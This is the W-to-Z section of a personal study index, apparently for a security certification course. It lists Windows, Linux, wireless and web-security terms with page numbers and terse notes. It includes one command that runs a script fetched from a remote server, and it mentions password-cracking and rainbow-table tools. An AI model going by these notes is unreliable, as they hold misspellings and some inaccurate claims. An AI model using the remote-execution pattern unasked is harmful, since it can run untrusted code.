WFAS rules "firewall rules"        5   215   how to make a rule "programs & services , users & computers , protocols & ports , scope "
wget.exr                           5   247   cmd http client
Whisker                            2   275   vulnarability scanner,CGI scan vuln
White box test                     2   274   Code is open source
Whitelisting                       2   268   allow only necessary characters
who command                        6   125   used to display the UTMP log file.
whoami /all/fo list                5    28   the names and sids of ypur groups and all your user rights SAT
whoami /priv                          5   118   can show your rights on the system
whoami.exe                            5   117
whoami.exe                            5   179
Whois DB                              4   260   gives u contact info [names, address, emails, phones], dns server information
WIC                                   5   116
wids wireless ids                     3   207   wireless ids,detect rogue access points
win firewall with advanced security   5    12   managable through group policy and NETSH.exe
Wincap                                3   195   packet capture for windows (or for Program running on windows is called WinDump)
windiff.exe                           5   315   gui of fc.exe show difference of files
windowes mobile                       5    17   full operating system,rsa secureID
windowes mobile best practises        5    19   patching,backup
windowes mobile hardening             5    17   Centralization Conf. Management, Anti Malware Scanners , Data Enc. & Acces Control
windowes server 2003                  5    9    standered server,enterprise sever,datacenter server
windowes server 2003                  5    9    edtions to provide scalability,fault-tolerance,clustring,network-load balancing
windowes server 2003 R2               5    10   32bit or 64bit,Distributed file system,ADFS,ADAM
windowes server 2003 web              5    9    support two 32-bit cpu,no more 2Gb or ram,can act as pop3,available for channel partners
windowes server 2008                  5    14   standered and enterprise,support 32,64bit,take care of hyper-v support
windowes server 2008 features         5    14   component modularization,server core,RODC,NAP,SSTP,
windowes server 2008 R2               5    16   active directory recycle bin,is 64 bit only,branchcache
windowes vista                        5    11   not incremental upgrade to win xp,slow performance ,backward comptability issues
windows 7/2008/vista backup           5    72   backup and restore center in control panal,not by location
windows and linux                     6    5    over 90% (93.4) use windows
windows event logs                    5   317   application,security,system,directory service for active domain,dns server , description field
windows event logs appliation logs    5   318   where os applications and third party tools write
windows firewall with advanced        5   211   wfas,statefull firewall can be manged through group policy and netsh.exe
windows management instrument         5   286   interface all scripts use to do things and also wmic.exe
Windows NT authen                     2   114   divid authen to domains,make trusts between them,Authen once/session
windows os                            5    5    windowes xp sp2,windowes2003
Windows password                      2   128   lan man ,14 char, broken to 7 char,no salts , all to upper case
windows scipts                        5   286   ********3 pages ********
windows server resource kit           5   286   dozens of vbscript
windows update service WUS            5    61   old version of WSUS
Windows xp home edition               5    6    can't join domain,no GPO,no Efs,no dual cpu support,no editable file system ACL
Windows xp sp2 features               5    7    windowes firewall,improvement in automatic updates,security center applet,DEP
Windows xp sp3 features               5    8    credential roaming support,wifi protected access,network access protection
windump                               6   191   tcpdump for windows
windump -D                            6   197   to list long interface names and shorthand number this number can be used after -i
winpcap                               1   138
Winrtgen                              2   134   tool:GUI,generate rainbow tables that can be used in cain(MD5,SHA,Lanman,NTLM)
wireless - network protecting                   4   190
wireless - denial of service                    4   183
wireless - denial of service(DoS) mitigation    4   185   prepare appropriate response strategy and IDS to react quickly to against attacker
wireless - eavesdropping                        4   179
wireless - eavesdropping mitigation             4   180
wireless - flaws in WiFi card firmware          4   184
wireless - general misconception                4   172
wireless - masquerading                         4   181
wireless - masquerading mitigation              4   182
wireless - masqureading - captive web           4   181
wireless - PEAP                                 4   182
wireless - risk misconception                   4   176
wireless - Rogue AP                             4   186
wireless - Rogue AP mitigation                  4   187
wireless - secure WLAN planning                 4   189
wireless - technical misconception              4   174
wireless - TTLS                                 4   182
Wireless advantage                              4   144
Wireless devices                                4   143   PDA, Mobile phones, Laptops, Pagers, HVAC control units.
wireless network mapping mitigation
wireless scanning                               3   145   passive or active,netstumbler or kismet
wireless-I donot need to worry about security   4   172
wireless-We don't have any wireless             4   172
wireshark &                                     6   193   to run the wireshark in the background to be able to use the shell again.
                                                          to see app layer conversation without header click on tcp port 25 packet in the top window and choose" follow tcp
wireshark analyze tool                          6   194   stream" in the analyze menu. Anew popup with the smtp conversation ( lines from server to client are blue and from
                                                          client to server are red)
                                                          it can extract just the tcp application layer conversations, it can give packet counts by the ip endpoints and it can
wireshark extracts                              6   193   show Cisco IOS rules that would allow or block this traffic, you also can set advenced filters to only look for
                                                          particular conversation or traffic type
                                                          let you maneuver around packets and headers, it also knows a great deal about the app layer protocols, it have the
wireshark GUI benefits                          6   193   ability to decode the actual conversation and show you an app layer sumary, it provide tools to analyze the
                                                          packets
wireshark session                               6   194   go to capture menu and choose interfaces and pick any interface then press start
                                                          return to main window with packets summarized in the top third when you click on any summaryline , the protocol
wireshark stop                                  6   194
                                                          header of that packet show up in the middle window .the hexdecode of the packet show up in the buttom window
WMI                                             5   137   windows management instrumentation,can write scripts for administritve tasks
wmi                                             5   286   windows management instrumentation,interface for scripts to use
wmic.exe                                5   277   wmic.exe <item> list full ******4 pages*******
wmic.exe /node:ip get servicepack       5   281   get the latest service pack installed on system
wmic.exe sysdriver list full            5   313   list the system drivers
wordlist mode                           2   126   no sorting,allow putt common words at beganing of the list
workgroup                               5    21   windows computers that share information in absence of any domain controller
workgroup benefits                      5    23   simple,each pc protect itself,lower costs,each user is admin on his pc
workgroup characteristics               5    21   no domain controllers
workgroup disadvantages                 5    24   no centralized management or auditing,no single sign-on,difficult to manage large no users
worm - Impacts                          2    26
worm toolkits                           3   117   non programms can make worms of any vulnerability
Worms                                   2    25   no need to attach in programm
Worms - configuration management        2    34
worms - Fix Worm                        2    33   patch,DID,network patition
WPA - (Wi-Fi protect access)            4   170   the wi-fi aliance adopted the AES-CCMP cipher mechanism designed for the new hardware
WPA2                                    4   170   results from the testing process for comliance with TKIP and AES-CCMP.
wrapping options                        5   327
WSB (windows server backup)             5    73   console snap in,can't backup selected files,like wbadmin,copy locked files == at server 2008and later
wscript.exe \\server\script.vbs         5   295   cause the scriptto be downloaded and excuted locally
WSH (Windows Script Host)               5   156   scripts can be written in any scripting language,interpreter
WSUS (windows server update services)   5    61   WSUS,2000 or later,free,install updates for different ms products,handle over 10000 pc
wsus administration                     5    64
wsus work                               5    63   must run on IIS6 or later,client connect via HTTP or HTTPS,use BITS
                                                  binary log file keep track of logins and logouts, shutdowns and reboot ( track intruder activities), similar to UTMP but
wtmp log                                6   123   grow in length and keep historical data; because it binary file it's used by last command (/var/log/wtmp), more info
                                                  than lastlog
wuau.adm template                       5    64   imported from Wsus server into GPO
X.509 extentions                        4   124   to distinguish between the certificates issued for browser and for server
XCACLS.exe                              5    90   modify NTFS permissions for win2000/xp/2003
xferlog                                 6   140   /var/log/xferlog, ftp logs
x-force                                 3   250   a division @ ibm iss, responsible for staying on top of security research and vulnerability detection.
xinetd                                  6    77   eXtended InterNET service daemon, more security features than inetd, & replace it
                                                  (perform access control, help prevent DOS attacks, log all snort info, bind IP address to service) & can start service
xinetd                                  6   77
                                                  that not listed in /etc/services
xinetd                                  6   106   config file in /etc/xinetd.conf /etc/xinetd.d
                                                  built in control mechanism as TCP Wrapper ACL, more logging option,built in support for warning banner, resource
xinetd                                  6   109
                                                  thresholds, redirect the service to services on other ports or other systems
xinetd access control                   6   77    can be done by ip, domain, hostname, time of access
xinetd network filter                   6   78    admin can bind a specific service to specific ip
                                                limit no of conn any host can make, how many incoming request will be answered at atime, kill service if limits
xinetd prevent DOS                    6   77
                                                exceeds so it is protect against DOS and portscan
XML report - SCW                      5   197
XOR function                          4    14
XSS                                   2   265   poor input validation,include javascript,inline frames,steal cookie,affect HTTPS,HTTP
xss filter                            5   187   examine the flow of data back and forth between web server and browser ,detect XSS
yum                                   6   166   GUI tools use rpm to install,upgrade,remove pkg (redhat & fedora)
yum check-update                      6   165   give list of what needs to be updated ( look for patches ( aka update sowtware))
yum install pkgname                   6   165   to install pkg with yum
yum update                            6   165   download the updates and install them( and it may take a lot of bandwidth and time)
Zero-sum game                         2   202
Zhu's Rainbwcrack                     2   134   tool:generate rainbow tables
Zhu's Rainbwcrack                     2   136   tool:generate rainbow tables
ZigBee - wireless                     4   158   Bsed on 802.15.4 Specs, low cost, cable-replacement tech
                                                ZigBee accommodates long battery life by limiting the amount of time the radio used is used, system remain
ZigBee - long battery life            4   159
                                                inactive until receiving a command to enable light.
ZigBee - security                     4   161   encryption based on AES-CCM (AES-Cipher block chaining-msg Authentication Code(CBC-MAC))
                                                provide security over: MAC (layer2), Newtorks (layer3), Applications (layer7), however the Same Key is used over
ZigBee - security                     4   161
                                                the three layers, selection of the key is done @ installation time by: manufacturer, installer, or end-user
                                                Range: 10m - 75m, Rate= [ 250 Kb/s @ 2.4 GHz, 40 Kb/s @ 915 MHz, 20 Kb/s @ 868 MHz], Freq= 868 MHz, 915
ZigBee - specification                4   159
                                                MHz, 2.4 GHz (DSSS), low power consumption
zpha (Zero Power High Availability)   3   242   zero power high availability for nips ,will re-route network traffic when IPS device lose power

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:619
posted:10/3/2011
language:English
pages:202